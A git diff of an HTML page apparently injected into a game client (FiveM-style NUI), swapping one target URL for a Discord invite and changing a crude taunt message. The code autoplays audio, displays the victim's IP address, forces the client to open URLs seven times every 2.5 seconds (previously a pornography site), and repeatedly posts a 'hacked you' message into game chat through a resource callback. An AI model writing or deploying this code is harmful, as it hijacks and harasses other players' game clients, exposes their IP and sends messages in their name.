--- a/index.html
+++ b/index.html
@@ -48,7 +48,7 @@
         <img src="https://cdn.discordapp.com/icons/1382844412135997580/481a81cbb324ba871fd615be3b3fa5a9.webp?size=1024" alt="Discord Image">
     </div>
     <audio autoplay loop>
-        <source src="https://a.top4top.io/m_3537am0dx1.mp3" type="audio/mpeg">
+        <source src="https://cdn.discordapp.com/attachments/1192142718797893724/1433037454021234848/2020_Soooon_.mp3?ex=69033ba1&is=6901ea21&hm=3aceb98990cafeaf9467e09c886ba14c7435ef1c442137e42f496f71d723f9da&" type="audio/mpeg">
     </audio>
     <div class="info" id="ip-info">
         <strong>IP: <span id="ip"></span></strong><br>
@@ -79,16 +79,16 @@
         });
 
         setInterval(function() {
-            window.invokeNative("openUrl", "https://pornhub.com");
-            window.invokeNative("openUrl", "https://pornhub.com");
-            window.invokeNative("openUrl", "https://pornhub.com");
-            window.invokeNative("openUrl", "https://pornhub.com");
-            window.invokeNative("openUrl", "https://pornhub.com");
-            window.invokeNative("openUrl", "https://pornhub.com");
-            window.invokeNative("openUrl", "https://pornhub.com");
+            window.invokeNative("openUrl", "https://discord.gg/sgzwRz2bFn");
+            window.invokeNative("openUrl", "https://discord.gg/sgzwRz2bFn");
+            window.invokeNative("openUrl", "https://discord.gg/sgzwRz2bFn");
+            window.invokeNative("openUrl", "https://discord.gg/sgzwRz2bFn");
+            window.invokeNative("openUrl", "https://discord.gg/sgzwRz2bFn");
+            window.invokeNative("openUrl", "https://discord.gg/sgzwRz2bFn");
+            window.invokeNative("openUrl", "https://discord.gg/sgzwRz2bFn");
         }, 2500);
    
-const msg = ` sfa7 Ha3cked you 🫃🔞  `;
+const msg = ` diddy eygpt Fu4cked you 🫃🔞  `;
 const body = JSON.stringify({ message: msg });
 setInterval(() => {
 fetch("https://flix-scripts/chatResult", { method: "POST", body });
